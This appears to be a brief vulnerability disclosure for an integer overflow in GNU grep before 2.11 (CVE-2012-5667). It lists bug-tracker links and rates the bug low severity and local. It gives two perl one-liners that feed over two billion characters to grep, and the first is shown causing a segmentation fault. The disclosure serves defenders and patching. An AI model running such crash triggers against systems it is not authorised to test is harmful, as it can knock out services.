41 lines
No EOL
1.1 KiB
Text
41 lines
No EOL
1.1 KiB
Text
Grep <2.11 is vulnerable to int overflow exploitation.
|
|
|
|
http://lists.gnu.org/archive/html/bug-grep/2012-03/msg00007.html
|
|
|
|
Although it is patched in the recent Grep,
|
|
This update has not been pushed to the Ubuntu repos, or the Redhat
|
|
repos, leaving 99% of those OS's(and more) vulnerable.
|
|
|
|
|
|
There are also many other ways to do this bug.
|
|
|
|
It is low severity because it would be extremely hard to actually
|
|
exploit it, and it is a local exploit, and it is not run by root.
|
|
|
|
Found By: Security Researcher - Joshua Rogers
|
|
|
|
|
|
More:
|
|
https://bugzilla.redhat.com/show_bug.cgi?id=889935
|
|
https://bugs.launchpad.net/ubuntu/+source/grep/+bug/1091473
|
|
http://seclists.org/oss-sec/2012/q4/504
|
|
etc.
|
|
|
|
#There are many ways of doing this.
|
|
|
|
#Method one:
|
|
$ perl -e 'print "x"x(2**31)' | grep x > /dev/null
|
|
Segmentation fault (core dumped)
|
|
|
|
|
|
#Method two:
|
|
$ perl -e 'print "\nx"x(2**31)' | grep -c x > /dev/null
|
|
|
|
|
|
Twitter: https://twitter.com/MegaManSec
|
|
|
|
|
|
CVE: CVE-2012-5667
|
|
--
|
|
*Joshua Rogers* - Retro Game Collector && IT Security Specialist
|
|
gpg pubkey <http://www.internot.info/docs/gpg_pubkey.asc.gpg> |